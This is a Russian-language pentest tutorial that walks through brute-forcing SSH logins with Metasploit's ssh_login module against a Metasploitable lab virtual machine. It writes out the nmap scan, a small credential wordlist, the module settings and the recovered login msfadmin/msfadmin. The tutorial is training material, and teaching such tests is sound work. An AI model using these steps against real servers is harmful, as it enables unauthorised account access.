Подбор пароля — важная операция в любом пентесте. Из этой статьи вы узнаете, как подобрать пароль SSH с помощью Metasploit в Kali Linux.
Еще по теме: Брут учетной записи администратора Windows
Брут SSH с помощью Metasploit в Kali Linux
Для начала мы настроим виртуальную машину Metasploitable. Потом найдем открытый SSH-порт и создадим словарь для брута. Ну, и в конце, подберем пароль SSH.
Настройка Metasploitable
Metasploitable Framework — удобная платформа для взлома и отладки хакерских навыков. Подробно про установку в этой статье.
После установки Metasploitable, перейдите к сетевым настройкам в Virtual Box и выберите Bridged Adapter (Сетевой мост), а затем нажмите OK.
Запустите виртуальные машины Metasploitable и Kali Linux
Войдите в Metasploitable и используя команду ifconfig, определите присвоенный локальный IP-адрес. В моем случае локальный IP-адрес:
1 |
192.168.1.105 |
Сканирование портов с помощью Nmap
В Kali Linux откройте терминал и выполните сканирование портов:
1 |
nmap <целевой ip> |
Среди открытых портов можно заметить открытый порт 22 (ssh).
Создание словаря для брута SSH в Metasploit
Прежде чем приступим к бруту, необходимо создать словарь для брута (текстовый файл с возможными именами пользователя и паролями). Также можете использовать популярный словарь для брута rockyou.txt, который уже присутствует в Kali Linux.
Для создания словаря введите команду:
1 2 3 4 5 6 7 8 9 |
cat>file.txt admin root msfadmin toor administrator admin123 root123 test |
Брутфорс SSH с помощью Metasploit в Kali Linux
Откройте Metasploit, набрав msfconsole в терминале Kali Linux.
В консоли Metasploit введите команду:
1 |
use auxiliary/scanner/ssh/ssh_login |
Следующая команда отобразить параметры, которые необходимо изменить для выполнения атаки.
1 |
show options |
Задайте следующие параметры (каждый отдельной строкой.)
1 2 3 4 5 6 |
set blank_passwords true set stop_on_success true set verbose true set user_file file.txt set pass_file file.txt set rhosts 192.168.1.105 |
Где rhosts — целевой IP-адрес
Для начала атаки введите команду:
1 |
exploit |
Как вы видите на скрине Metasploit смог подобрать пароль В моем случае:
1 2 3 |
логин - msfadmin пароль - msfadmin |
Теперь можно использовать эти данные для подключения.
Защита от брута SSH в Linux
На эту тему есть отдельная статья «Защита от Брутфорса SSH в Linux».